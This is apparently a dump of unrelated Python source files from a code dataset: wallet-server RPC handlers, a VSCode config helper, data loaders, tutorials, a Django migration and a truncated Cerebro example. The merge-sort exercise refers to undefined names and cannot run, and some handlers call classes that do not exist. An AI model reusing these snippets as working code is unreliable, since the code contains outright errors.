print(\"USDP_GetBalance error:{0} in {1}\".format(e,get_linenumber()))\n\n \nclass USDP_SendRawTransaction(BaseHandler):\n def post(self):\n rpcconn = USDPProxy(g_IP, g_PORT)\n try:\n data = str(self.get_argument(\"tx\"))\n if len(data) < 40:\n self.write(json.dumps(BaseHandler.error_ret_with_data(\"arguments error\")))\n return\n rsp = rpcconn.sendRawTransaction(data)\n\n retData = {}\n retData[\"txid\"] = rsp[\"txhash\"]\n retData[\"blockNumber\"] = rsp[\"height\"]\n retData[\"gasUsed\"] = str(float(rsp[\"gas_used\"])/(10**8))\n\n self.write(json.dumps(BaseHandler.success_ret_with_data(retData), default=decimal_default))\n except Exception as e:\n self.write(json.dumps(BaseHandler.error_ret_with_data(\"error: %s\"%e)))\n print(\"USDP_SendRawTransaction error:{0} in {1}\".format(e,get_linenumber()))\n\nclass USDP_ListAccounts(BaseHandler):\n @staticmethod\n def addresses():\n from sql import run\n accounts = run('select address from t_usdp_accounts')\n return [account['address'].strip() for account in accounts]\n\n def get(self):\n rpcconn = USDPProxy(g_IP, g_PORT)\n try:\n data = USDP_ListAccounts.addresses()\n self.write(json.dumps(BaseHandler.success_ret_with_data(data), default=decimal_default))\n except Exception as e:\n self.write(json.dumps(BaseHandler.error_ret_with_data(\"error: %s\"%e)))\n print(\"USDP_ListAccounts error:{0} in {1}\".format(e,get_linenumber()))\n\n \nclass USDP_GetLatestBlockNumber(BaseHandler):\n @staticmethod\n def latest(rpcconn):\n lastestBlockNum = int(rpcconn.getLastestBlockNumber())\n return lastestBlockNum\n\n def get(self):\n rpcconn = USDPProxy(g_IP, g_PORT)\n try:\n data = USDP_BlockNumber.latest(rpcconn)\n self.write(json.dumps(BaseHandler.success_ret_with_data(data), default=decimal_default))\n except Exception as e:\n self.write(json.dumps(BaseHandler.error_ret_with_data(\"error: %s\"%e)))\n print(\"USDP_BlockNumber error:{0} in {1}\".format(e,get_linenumber()))\n\nclass USDP_GetTransactionFromBlock(BaseHandler):\n @staticmethod\n def getTransactionFromBlock(rpcconn, nBlockNum):\n data = rpcconn.getBlockByBlockNum(nBlockNum)\n import time\n timeStr = data[\"block_meta\"][\"header\"][\"time\"]\n timeStr = timeStr[ : timeStr.rfind('.') ]\n ta = time.strptime(timeStr, \"%Y-%m-%dT%H:%M:%S\")\n timestamp = int(time.mktime(ta))\n print(\"timestamp\", timestamp)\n\n\n retData = []\n txs = data[\"block\"][\"txs\"]\n if not isinstance(txs, list): return []\n for tx in txs:\n txData = {}\n txData[\"txid\"] = tx[\"Hash\"]\n txData[\"from\"] = tx[\"From\"]\n txData[\"to\"] = tx[\"To\"]\n txData[\"amount\"] = \"%.8f\" % (float(tx[\"Amount\"][0][\"amount\"]) / (10**8))\n txData[\"timestamp\"] = timestamp\n\n\n retData.append(txData)\n return retData\n\n\n\n def post(self):\n rpcconn = USDPProxy(g_IP, g_PORT)\n try:\n nBlockNum = self.get_argument(\"blkNumber\")\n data = USDP_GetTransactionFromBlock.getTransactionFromBlock(rpcconn, nBlockNum)\n self.write(json.dumps(BaseHandler.success_ret_with_data(data), default=decimal_default))\n except Exception as e:\n self.write(json.dumps(BaseHandler.error_ret_with_data(\"error: %s\"%e)))\n print(\"USDP_GetTransactionFromBlock : error:{0} in {1}\".format(e,get_linenumber()))\n\n\nclass USDP_GetAccountInfo(BaseHandler):\n @staticmethod\n def account_info(rpcconn, addr):\n data = rpcconn.getAccountInfo(addr)\n retData = {}\n retData[\"address\"] = data[\"value\"][\"address\"]\n retData[\"account_number\"] = data[\"value\"][\"account_number\"]\n retData[\"sequence\"] = data[\"value\"][\"sequence\"]\n retData[\"balance\"] = data[\"value\"][\"coins\"][0][\"amount\"] \n return retData\n\n def post(self):\n rpcconn = USDPProxy(g_IP, g_PORT)\n try:\n addr = self.get_argument(\"address\")\n if len(addr) != 43:\n self.write(json.dumps(BaseHandler.error_ret_with_data(\"arguments error\")))\n return\n if addr[ : 5] != \"usdp1\":\n self.write(json.dumps(BaseHandler.error_ret_with_data(\"arguments error\")))\n return\n data = USDP_GetAccountInfo.account_info(rpcconn, addr)\n self.write(json.dumps(BaseHandler.success_ret_with_data(data), default=decimal_default))\n except Exception as e:\n if str(e) == \"500\":\n self.write(json.dumps(BaseHandler.error_ret_with_data(\"error: not found any info of the account. Due to the account DOT NOT have transactions yet. \")))\n else:\n self.write(json.dumps(BaseHandler.error_ret_with_data(\"error: %s\"%e)))\n print(\"USDP_GetAccountInfo error:{0} in {1}\".format(e,get_linenumber()))\n\n\n\n\n#2019-05-11 yqq\n#获取用户充币信息的接口, 直接从数据库中获取交易数据\nclass USDP_CrawlTxData(BaseHandler):\n\n def GetTxDataFromDB(self, nBegin, nEnd):\n\n #增加参数检查\n #print(\"nBegin , nEnd type is not int.\")\n #if not (isinstance(nBegin, int) and isinstance(nEnd, int)):\n if not (isinstance(nBegin, int) and (isinstance(nEnd, int) or isinstance(nEnd, long) )):\n print(\"nBegin is not int\")\n return []\n\n \n txRet = []\n\n import sql\n strSql = \"\"\"SELECT txdata FROM t_usdp_charge WHERE height >= {0} and height <= {1} LIMIT 100;\"\"\".format(nBegin, nEnd)\n #strSql = \"\"\"SELECT txdata FROM t_eth_charge WHERE height >= {0} \"\"\".format(nBegin) #\n #print(strSql)\n sqlRet = sql.run(strSql)\n #print(sqlRet)\n if not isinstance(sqlRet, list):\n return []\n for item in sqlRet:\n txListStr = item[\"txdata\"]\n txList = json.loads(txListStr)\n txRet.extend(txList)\n return txRet\n\n #@staticmethod\n def process(self, rpc_connection, nStart):\n txRet = self.GetTxDataFromDB(nStart, (1<<64) - 1) #TODO: 如果充币数据量太大, 需要限制每次返回的数量\n return txRet \n\n\n def post(self):\n rpcconn = USDPProxy(g_IP, g_PORT)\n try:\n nStart = int(self.get_argument(\"blknumber\"))\n data = self.process(rpcconn, nStart)\n self.write(json.dumps(BaseHandler.success_ret_with_data(data), default=decimal_default))\n except Exception as e:\n self.write(json.dumps(BaseHandler.error_ret_with_data(\"error: %s\"%e)))\n print(\"USDP_CrawlTxData error:{0} in {1}\".format(e,get_linenumber()))\n\n","sub_path":"项目/wallet_server/rpc/usdp/handler.py","file_name":"handler.py","file_ext":"py","file_size_in_byte":7935,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"96057552","text":"# list comrehension\n# [expr(item) for item in iterable]\nfrom math import factorial\nfrom pprint import pprint as pp\n\n\nf = [len(str(factorial(x))) for x in range(20)]\nprint(f)\nprint(type(f))\n\n\n# {key_expr:value_expr for item in iterable}\ncountry_to_capital = {'China': 'Beijing',\n 'American': 'Washington',\n 'Janpan': 'Tokyo',\n 'Mexico': 'Mexico City',\n 'Sweden': 'Stockholm'}\n\npp(country_to_capital)\ncapital_to_country = {capital: country for country, capital in country_to_capital.items()}\npp(capital_to_country)\n\n# Duplicates: later keys overwrite earlier keys\nwords = ['hi', 'hello', 'lixue', 'lixueyang', 'hotel']\nword_to_letter = {x[0]: x for x in words}\npp(word_to_letter)\n\n","sub_path":"list comrehension.py","file_name":"list comrehension.py","file_ext":"py","file_size_in_byte":763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"534685315","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n#############################################################################\n# Copyright Vlad Popovici <popovici@bioxlab.org>\n#\n# Licensed under the Apache License, Version 2.0 ( the \"License\" );\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#############################################################################\n\n\"\"\"\nCP_META: extract various information from the meta file (meta.json) produced\nwhen tiling/importing the WSI.\n\"\"\"\n\n__author__ = \"Vlad Popovici <popovici@bioxlab.org>\"\n__version__ = 0.1\n\nimport argparse as opt\nimport simplejson as json\nimport os.path\nfrom math import floor\n\n\ndef main():\n p = opt.ArgumentParser(description=\"Extracts pieces of info from META file.\")\n p.add_argument('meta_path', action='store', help='full path to meta.json (excluding meta.json)')\n p.add_argument('--list_stains', action='store_true', help='list stains in the file')\n p.add_argument('-s', '--stain', action='store', help='stain of interest')\n p.add_argument('-m', '--magnification', action='store', default='',\n help='magnification of interest (e.g. 1.25x or 20.0x)')\n p.add_argument('--print_ROI', action='store_true',\n help='print ROI (for the specified stain and magnification) as x0 y0 width height')\n p.add_argument('--target_magnification', action=\"store\", default='',\n help='if specified, scale ROI to the desired magnification')\n\n args = p.parse_args()\n\n meta_file = args.meta_path + os.path.sep + 'meta.json'\n if not os.path.exists(meta_file):\n raise RuntimeError(\"Cannot find \" + meta_file)\n\n with open(meta_file, 'r') as fd:\n meta = json.load(fd)\n\n if args.list_stains:\n stains = list()\n for k in meta:\n if k in ['mpp_x', 'mpp_y', 'objective']:\n continue\n stains.append(k)\n print(' '.join(stains))\n\n return\n\n if args.print_ROI:\n stain = args.stain\n if len(stain) == 0 or stain not in meta:\n raise RuntimeError(\"Stain not specified or not in the meta.json file\")\n mag = args.magnification\n if len(mag) == 0 or \"mag:\"+mag not in meta[stain]:\n raise RuntimeError(\"Magnification not specified or not in meta.json file\")\n sm = float(mag[:-1]) # drop 'x' at the end\n if len(args.target_magnification) == 0:\n args.target_magnification = args.magnification\n tm = float(args.target_magnification[:-1])\n f = tm / sm\n mag = 'mag:' + mag\n\n x = int(floor(f * float(meta[stain][mag]['from_original_x'])))\n y = int(floor(f * float(meta[stain][mag]['from_original_y'])))\n w = int(floor(f * float(meta[stain][mag]['from_original_width'])))\n h = int(floor(f * float(meta[stain][mag]['from_original_height'])))\n\n print(x, y, w, h, sep=' ')\n\n return\n\n\n##\nif __name__ == \"__main__\":\n main()","sub_path":"tools/cp_meta.py","file_name":"cp_meta.py","file_ext":"py","file_size_in_byte":3388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"161749675","text":"import numpy as np\nfrom utilities import calc_eta, calc_phi, filter_samples, filter_objects\n\nclass ActsData():\n \"\"\"Empty class for setting variables as attributes\"\"\"\n pass\n\ndef load_data(filename):\n \"\"\"\n Retrieve data from one file\n Returns a data object with attributes for each numpy array\n \"\"\"\n d = ActsData()\n f = np.load(filename, encoding='bytes')\n # Track level truth quantities\n d.true_theta = f['truth_Theta']\n d.true_eta = calc_eta(d.true_theta)\n d.true_phi = f['truth_Phi']\n d.true_qop = f['truth_QoverP']\n d.true_pt = np.abs(1/d.true_qop)\n # Detector hit measurements\n d.nstep = f['Filter_nSteps']\n d.rphi = f['Meas_RPHI']\n d.z = f['Meas_z']\n d.r = f['Cyl_R']\n d.phi = calc_phi(d.rphi, d.r)\n d.KF_z = f['Filter_z']\n d.KF_phi = f['Filter_Phi']\n d.KF_r = f['Filter_R']\n return d\n\ndef clean_data(data, fix_phi=False):\n \"\"\"\n Cleans up the data, selecting barrel tracks and good hits.\n \"\"\"\n barrel_tracks = np.abs(data.true_eta) < 1\n d = ActsData()\n\n # filter out all tracks not perfectly in the barrel.\n d.true_theta, d.true_eta, d.true_phi, d.true_qop, d.true_pt = (\n filter_samples(barrel_tracks, data.true_theta, data.true_eta,\n data.true_phi, data.true_qop, data.true_pt))\n d.nstep, d.rphi, d.z, d.r, d.phi = (\n filter_samples(barrel_tracks, data.nstep, data.rphi,\n data.z, data.r, data.phi))\n d.KF_z, d.KF_phi, d.KF_r = (\n filter_samples(barrel_tracks, data.KF_z, data.KF_phi,\n data.KF_r))\n\n # To select the actual layer hits, I select the indices of the steps\n # I want. I'm currently taking the middle of each detector layer triplet,\n # and ignoring all of the apparent \"auxiliary\" steps. This assumes\n # all tracks have the fixed 31 steps as previously discovered, so it's\n # a bit fragile and will need to be updated if the data changes.\n assert np.all(d.nstep == 31)\n #good_hit_idxs = np.array([1, 4, 9, 11, 14, 17, 20, 24, 27])\n good_hit_idxs = np.array([2, 5, 8, 11, 15, 18, 21, 25, 28])\n d.rphi, d.z, d.r, d.phi = filter_objects(\n good_hit_idxs, d.rphi, d.z, d.r, d.phi)\n d.KF_r, d.KF_z, d.KF_phi = filter_objects(\n good_hit_idxs, d.KF_r, d.KF_z,d.KF_phi)\n \n # Current data has some funny artifacts in phi.\n # Here is a shitty, hacky correction. Needs to be fixed upstream.\n if fix_phi:\n for i in range(d.phi.shape[1]):\n phi = d.phi[:,i]\n phi = phi * np.pi * 2 / (phi.max() - phi.min())\n d.phi[:,i] = phi - phi.min() - np.pi\n for i in range(d.KF_phi.shape[1]):\n KF_phi = d.KF_phi[:,i]\n KF_phi = KF_phi * np.pi * 2 / (KF_phi.max() - KF_phi.min())\n d.KF_phi[:,i] = KF_phi - KF_phi.min() - np.pi\n\n # Calculate theta\n d.theta = np.arctan(d.r / d.z)\n # Fix negative values so theta ranges from (0, pi)\n negidx = d.theta < 0\n d.theta[negidx] = d.theta[negidx] + np.pi\n d.eta = calc_eta(d.theta)\n\n return d\n","sub_path":"rnnlhc/rnnlhc/fitting/acts_data.py","file_name":"acts_data.py","file_ext":"py","file_size_in_byte":3064,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"100621028","text":"'''VSCode helper functions'''\nimport platform, subprocess, os, json, shutil, copy\nfrom mod import util, log, dep\n\nname = 'vscode'\nplatforms = ['osx','linux','win']\noptional = True\nnot_found = 'used as IDE with vscode configs'\n\n#------------------------------------------------------------------------------\ndef try_exists(exe_name):\n try:\n if platform.system() == 'Windows':\n subprocess.check_output('{} --version'.format(exe_name), shell=True)\n else:\n subprocess.check_output([exe_name, '--version'])\n return True\n except (OSError, subprocess.CalledProcessError):\n return False\n\n#------------------------------------------------------------------------------\ndef exe_name():\n if try_exists('code'):\n return 'code'\n else:\n # open source version on RaspberryPi\n return 'code-oss'\n\n#------------------------------------------------------------------------------\ndef check_exists(fips_dir) :\n \"\"\"test if 'code' is in the path\n :returns: True if code is in the path\n \"\"\"\n if exe_name() != 'code':\n return try_exists('code-oss')\n else:\n return True\n\n#------------------------------------------------------------------------------\ndef match(build_tool):\n return build_tool == 'vscode'\n\n#------------------------------------------------------------------------------\ndef run(proj_dir):\n exe = exe_name()\n proj_name = util.get_project_name_from_dir(proj_dir)\n try:\n subprocess.call('{} .vscode/{}.code-workspace'.format(exe, proj_name), cwd=proj_dir, shell=True)\n except OSError:\n log.error(\"Failed to run Visual Studio Code as '{}'\".format(exe))\n\n#-------------------------------------------------------------------------------\ndef write_launch_json(fips_dir, proj_dir, vscode_dir, cfg, proj_settings):\n '''write the .vscode/launch.json file'''\n launch = {\n 'version': '0.2.0',\n 'configurations': []\n }\n proj_name = util.get_project_name_from_dir(proj_dir)\n deploy_dir = util.get_deploy_dir(fips_dir, proj_name, cfg['name'])\n launch_config = {\n 'request': 'launch',\n 'program': '${command:cmake.launchTargetPath}',\n 'cwd': deploy_dir,\n 'args': [],\n\n }\n host_platform = util.get_host_platform()\n if host_platform == 'win':\n launch_config['type'] = 'cppvsdbg'\n elif host_platform == 'linux':\n launch_config['type'] = 'cppdbg'\n launch_config['MIMode'] = 'gdb'\n else:\n # on macOS, use the CodeLLDB extension, since the MS C/C++ debugger\n # integration seems all kinds of broken\n #launch_config['type'] = 'cppdbg'\n #launch_config['MIMode'] = 'lldb'\n launch_config['type'] = 'lldb'\n\n launch_config['name'] = 'Debug Current Target'\n launch['configurations'].append(copy.deepcopy(launch_config))\n\n launch_config['name'] = 'Debug Current Target (Stop at Entry)'\n if launch_config['type'] == 'lldb':\n launch_config['stopOnEntry'] = True\n else:\n launch_config['stopAtEntry'] = True\n launch['configurations'].append(copy.deepcopy(launch_config))\n\n # add a python code-generator debug config\n #\n # FIXME: this no longer works (e.g. pythonPath is not recognized)\n #\n #proj_name = util.get_project_name_from_dir(proj_dir)\n #build_dir = util.get_build_dir(fips_dir, proj_name, cfg['name'])\n #c = {\n # 'name': 'fips codegen',\n # 'type': 'python',\n # 'request': 'launch',\n # 'stopOnEntry': True,\n # 'pythonPath': '${config:python.pythonPath}',\n # 'program': build_dir + '/fips-gen.py',\n # 'args': [ build_dir + '/fips_codegen.yml' ],\n # \"cwd\": proj_dir,\n # \"debugOptions\": [\n # \"WaitOnAbnormalExit\",\n # \"WaitOnNormalExit\",\n # \"RedirectOutput\"\n # ]\n #}\n #launch['configurations'].append(c)\n\n # add a python debug config for each fips verb\n #\n # FIXME: this no longer works (e.g. pythonPath is not recognized)\n #\n # for verb_name, verb_mod in verb.verbs.items() :\n # # ignore standard verbs\n # if fips_dir not in inspect.getfile(verb_mod):\n # c = {\n # 'name': 'fips {}'.format(verb_name),\n # 'type': 'python',\n # 'request': 'launch',\n # 'stopOnEntry': True,\n # 'pythonPath': '${config:python.pythonPath}',\n # 'program': proj_dir + '/fips',\n # 'args': [ verb_name ],\n # 'cwd': proj_dir,\n # \"debugOptions\": [\n # \"WaitOnAbnormalExit\",\n # \"WaitOnNormalExit\",\n # \"RedirectOutput\"\n # ]\n # }\n # launch['configurations'].append(c)\n\n launch_path = vscode_dir + '/launch.json'\n log.info(' writing {}'.format(launch_path))\n with open(launch_path, 'w') as f:\n json.dump(launch, f, indent=1, separators=(',',':'))\n\n#-------------------------------------------------------------------------------\ndef write_code_workspace_file(fips_dir, proj_dir, impex, cfg):\n '''write a multiroot-workspace config file'''\n vscode_dir = proj_dir + '/.vscode'\n proj_name = util.get_project_name_from_dir(proj_dir)\n deploy_dir = util.get_deploy_dir(fips_dir, proj_name, cfg['name'])\n ws = {\n 'folders': [],\n 'settings': {\n 'cmake.statusbar.advanced': {\n 'ctest': { 'visibility': 'hidden' },\n 'testPreset': { 'visibility': 'hidden' },\n 'debug': { 'visibility': 'hidden' },\n },\n 'cmake.debugConfig': { 'cwd': deploy_dir },\n 'cmake.autoSelectActiveFolder': False,\n 'cmake.ignoreCMakeListsMissing': True,\n 'cmake.configureOnOpen': False,\n }\n }\n # add dependencies in reverse order, so that main project is first\n for dep_proj_name in reversed(impex):\n dep_proj_dir = util.get_project_dir(fips_dir, dep_proj_name)\n excluded = False\n if 'vscode_exclude_from_workspace' in cfg:\n for exclude_dep in cfg['vscode_exclude_from_workspace']:\n if dep_proj_name == exclude_dep:\n excluded = True\n break\n if not excluded:\n ws['folders'].append({ 'path': dep_proj_dir })\n proj_name = util.get_project_name_from_dir(proj_dir)\n ws_path = '{}/{}.code-workspace'.format(vscode_dir, proj_name)\n log.info(' writing {}'.format(ws_path))\n with open(ws_path, 'w') as f:\n json.dump(ws, f, indent=1, separators=(',',':'))\n\n#-------------------------------------------------------------------------------\ndef remove_vscode_tasks_launch_files(fips_dir, proj_dir, impex, cfg):\n '''walks through the dependencies, and deletes the .vscode/tasks.json\n and .vscode/launch.json files\n '''\n for dep_proj_name in reversed(impex):\n dep_proj_dir = util.get_project_dir(fips_dir, dep_proj_name)\n tasks_path = dep_proj_dir + '/.vscode/tasks.json'\n launch_path = dep_proj_dir + '/.vscode/launch.json'\n if os.path.exists(tasks_path):\n log.info(' deleting {}'.format(tasks_path))\n os.remove(tasks_path)\n if os.path.exists(launch_path):\n log.info(' deleting {}'.format(launch_path))\n os.remove(launch_path)\n\n#-------------------------------------------------------------------------------\ndef write_workspace_settings(fips_dir, proj_dir, cfg, proj_settings):\n '''write the VSCode launch.json, tasks.json and\n c_cpp_properties.json files from cmake output files\n '''\n log.info(\"=== writing Visual Studio Code config files...\")\n vscode_dir = proj_dir + '/.vscode'\n if not os.path.isdir(vscode_dir):\n os.makedirs(vscode_dir)\n # fetch all project dependencies\n success, impex = dep.get_all_imports_exports(fips_dir, proj_dir)\n if not success :\n log.warn(\"missing import project directories, please run 'fips fetch'\")\n remove_vscode_tasks_launch_files(fips_dir, proj_dir, impex, cfg)\n write_launch_json(fips_dir, proj_dir, vscode_dir, cfg, proj_settings)\n write_code_workspace_file(fips_dir, proj_dir, impex, cfg)\n\n#-------------------------------------------------------------------------------\ndef cleanup(fips_dir, proj_dir):\n '''goes through all dependencies and deletes the .vscode directory'''\n # fetch all project dependencies\n success, impex = dep.get_all_imports_exports(fips_dir, proj_dir)\n if not success :\n log.warn(\"missing import project directories, please run 'fips fetch'\")\n log.info(log.RED + 'Please confirm to delete the following directories:' + log.DEF)\n for dep_proj_name in reversed(impex):\n dep_proj_dir = util.get_project_dir(fips_dir, dep_proj_name)\n vscode_dir = dep_proj_dir + '/.vscode/'\n if os.path.isdir(vscode_dir):\n log.info(' {}'.format(vscode_dir))\n if util.confirm(log.RED + 'Delete those directories?' + log.DEF):\n for dep_proj_name in reversed(impex):\n dep_proj_dir = util.get_project_dir(fips_dir, dep_proj_name)\n vscode_dir = dep_proj_dir + '/.vscode/'\n if os.path.isdir(vscode_dir):\n log.info(' deleting {}'.format(vscode_dir))\n shutil.rmtree(vscode_dir)\n log.info('Done.')\n else:\n log.info('Nothing deleted, done.')\n","sub_path":"mod/tools/vscode.py","file_name":"vscode.py","file_ext":"py","file_size_in_byte":9432,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"497464912","text":"from nn import simple_neural as nn\nimport numpy as np\nfrom numpy import genfromtxt\nimport csv\nimport datagen\nfrom sklearn.model_selection import train_test_split\nfrom matplotlib import pyplot as plt\n\n\n\n\n\ndef generate_tests(num_tests=36, num_drivers=10000, beta_weight=1):\n\tdata, classes = datagen.function(num_drivers, beta_weight=beta_weight)\n\tX_train, X_test, y_train, y_test = train_test_split(data, classes, \n\t\t\t\t\t\t\t\t\t\t\t\t\t\ttest_size=0.20, random_state=420)\n\treturn X_train, X_test, y_train, y_test\n\n\ndef index_of_threshold(array, threshold=1):\n\tcount = len(array)\n\tfor i in xrange(count):\n\t\tif (array[i] >= threshold):\n\t\t\treturn i+1\n\t\t\n\treturn -1\n\nnn_parameters = {\n 'learning_rate': 0.001,\n 'training_epochs': 10,\n 'batch_size': 1,\n 'display_step': 1,\n 'test_step': 1,\n}\n\nnn_network_def = {\n 'dim_input': 36,\n 'dim_layer1': 150,\n 'dim_layer2': 250,\n 'dim_output': 4,\n}\n\n\n\n\nbeta_weights_list = [0.01, 0.05, 0.15, 0.25, 0.5, 0.75, 1.0]\nsize95array = []\nnn_accuracy_data = []\nfor weight in beta_weights_list:\n\t# Size of the feature vector\n\tsize_for_95 = -1\n\n\tfor size in xrange(1, 36):\n\t\tnn_network_def['dim_input'] = size\n\t\tX_train, X_test, y_train, y_test = generate_tests(beta_weight = weight)\n\t\tX_train = X_train[:,0:size]\n\t\tX_test = X_test[:,0:size]\n\t\tepochs, accuracy, cost = nn.multilayer_perceptron(X_train, X_test, \n\t\t\t\t\t\t\t\ty_train, y_test, \n\t\t\t\t\t\t\t\tnn_parameters=nn_parameters, \n\t\t\t\t\t\t\t\tnn_network_def=nn_network_def)\n\n\t\tif index_of_threshold(accuracy, threshold=0.95) > -1:\n\t\t\tsize_for_95 = index_of_threshold(accuracy, threshold=0.95)\n\t\t\tbreak\n\n\tsize95array.append(size_for_95)\n\n\t# We want to plot accuracy in the y axis and epochs in the x\n\nplt.plot(beta_weights_list, size95array)\nplt.show()\n\n","sub_path":"neural.py","file_name":"neural.py","file_ext":"py","file_size_in_byte":1736,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"29236782","text":"class Car():\n def __init__(self, make, model, year):\n self.make = make\n self.model = model\n self.year = year\n # 指定默认值\n self.odometer_reading = 0\n\n def get_name(self):\n long_name = str(self.year) + ' ' + self.make + ' ' + self.model\n return long_name.title()\n\n def read_odometer(self):\n print(\"this car has \" + str(self.odometer_reading) + \" miles on it.\")\n\n # 修改属性的值 方式二:通过方法修改\n def update_odometer(self, mileage):\n if mileage >= self.odometer_reading:\n self.odometer_reading = mileage\n else:\n print(\"you can't roll back an odometer.\")\n\n # 修改属性的值 方式三:通过方法对属性的值进行递增\n def increment_odometer(self, miles):\n self.odometer_reading += miles\n\n\nif __name__ == '__main__':\n my_car = Car('audi', 'a4', 2016)\n print(my_car.get_name())\n\n # 修改属性的值 方式一:直接修改\n # my_car.odometer_reading = 23\n\n my_car.update_odometer(23)\n my_car.read_odometer()\n\n my_car.increment_odometer(100)\n my_car.read_odometer()\n","sub_path":"fundamental/类/demo01/car.py","file_name":"car.py","file_ext":"py","file_size_in_byte":1146,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"351841748","text":"def sort(a,start, end):\r\n if len(a)>1:\r\n mid=len(a)//2\r\n left=M[:mid]\r\n right=M[mid:]\r\n \r\n sort(left, start, start+mid-1)\r\n sort(right, start+mid, end)\r\n \r\n i, j, k=0,0,0\r\n while i<len(left) and j<len(right):\r\n if left[i]<right[j]:\r\n a[k]=left[i]\r\n i+=1\r\n else:\r\n a[k]= right[j]\r\n j+=1\r\n k+=1\r\n\r\n while j <len(right):\r\n a[k]=right[j]\r\n j+=1\r\n k+=1\r\n while i <len(left):\r\n a[k]=left[i]\r\n i+=1\r\n k+=1\r\n print(start, end, a[0], a[-1])\r\n return a\r\n\r\nn = int(input())\r\na = list(map(int, input().split()))[:n]\r\nmerge_sort(a,1,len(a))\r\nprint(*a)","sub_path":"модуль 2. задание 3.py","file_name":"модуль 2. задание 3.py","file_ext":"py","file_size_in_byte":779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"269284693","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('catalog', '0015_auto_20150426_1135'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='product',\n name='is_bestseller',\n field=models.BooleanField(default=False, help_text=\"Select this ONLY if you select a picture of the product insideProduct's masonry thumbnail\", verbose_name='Show product on home page'),\n ),\n migrations.AlterField(\n model_name='productsize',\n name='name',\n field=models.CharField(help_text='**REQUIRED**. Pick a name for a size', unique=True, max_length=15, verbose_name='Product size'),\n ),\n migrations.AlterField(\n model_name='productsize',\n name='name_el',\n field=models.CharField(help_text='**REQUIRED**. Pick a name for a size', max_length=15, unique=True, null=True, verbose_name='Product size'),\n ),\n migrations.AlterField(\n model_name='productsize',\n name='name_en',\n field=models.CharField(help_text='**REQUIRED**. Pick a name for a size', max_length=15, unique=True, null=True, verbose_name='Product size'),\n ),\n migrations.AlterField(\n model_name='productsize',\n name='name_it',\n field=models.CharField(help_text='**REQUIRED**. Pick a name for a size', max_length=15, unique=True, null=True, verbose_name='Product size'),\n ),\n ]\n","sub_path":"catalog/migrations/0016_auto_20150426_1356.py","file_name":"0016_auto_20150426_1356.py","file_ext":"py","file_size_in_byte":1592,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"399248459","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\nПримеры создания задач.\nЭтот модуль демонстритует, как можно устанавливать соединение с базой данных,\nсоздавать задачи и связывать их между собой без использования графического интерфейса Cerebro.\nТакже в модуле продемонстрировано создание сообшений и прикладывание к ним файлов.\n\nМодуль использует пакет pycerebro (для Python 3.x), который входит в дистрибутив service-tools (http://cerebrohq.com/distribs/service-tools.zip).\nТак же модуль pycerebro доступен на GitHub (https://github.com/cerebrohq/cerebro-plugins/tree/master/end-plugins/pycerebro)\nПакет pycerebro содержит модули для установки соединения с базой данных\nи для доступа к файловому хранилищу(Cargador).\n\nПакет pycerebro использует сторонние модули requests и iso8601, которые используются для работы с базой данных.\nВозможно вам придется дополнительно установить эти пакеты.\n\nМодуль содержит функции:\n\ncreate_and_link_tasks - пример создания задач и установления между ними связей.\nmake_thumnails - для генерации эскизов к видео файлам и изображениям\n\"\"\"\n\nimport fnmatch\nimport sys\nimport os\nimport subprocess\nimport datetime\n\nlocal_dir = os.path.realpath(__file__).replace('\\\\', '/').rsplit('/', 1)[0]\nbackend_dir = local_dir + '/../..'\nsys.path.append(backend_dir)\n\nfrom pycerebro import database, dbtypes, cargador # в модуле dbtypes описаны различные константы, такие как поля данных, флаги и т.п.\n\n\n# Переменные, которые вам возможно придется изменить, чтобы преспособить скpипт для вашей сети\n\ncargador_host = 'ss' # Cетевой адрес машины, где работает севрис каргадор.\n# Может быть задано сетевое имя или IP адрес. 'ss' - это имя нашего сервера, у вас этот параметр скорее всего будет иным.\n\ncargador_xmlrpc_port = 4040 # Порт 4040 - это порт для запросов по xmlrpc протоколу.\n#У вас порт может быть иным, подробнее об этом смотрите в комментариях модуля cargador пакета pycerebro.\n\ncargador_http_port = 4080 # Порт 4080 - это порт для запросов по http протоколу.\n#У вас порт может быть иным, подробнее об этом смотрите в комментариях модуля cargador пакета pycerebro.\n\nproject_name = 'Test project' # Имя проекта для тестового добавления задач. \n#Вы можете выбрать любой свой проект\n\nmirada_path = '//ss/front/cerebro/mirada.exe' # Путь, откуда запускать мираду для генерации эскизов.\n#У вас этот параметр скорее всего будет иным. Подробнее смотрите в функции\n\ndef create_and_link_tasks(db_user, db_password):\n\t\"\"\"\n\tdb_user и db_password это логин и пароль пользователя Cerebro\n\t\n\tВ этом примере мы создадим в проекте задачу и две подзадачи. \n\tУ задачи выставим время начала, у подзадач запланируем время исполнения и свяжем их между собой.\n\tТакже мы создадим у подзадач сообщения типа постановка задачи и приложим к ним файлы.\n\tМы не будем в этом примере самостоятельно писать sql-запросы, а воспольуемся функцями класса database.Database,\n\tкоторые по сути являются обертками над sql-запросами. \n\tОписание всех функций смотрите в модуле database пакета pycerebro.\n\t\t\n\tПример вызова функции:\n\t::\n\t\timport 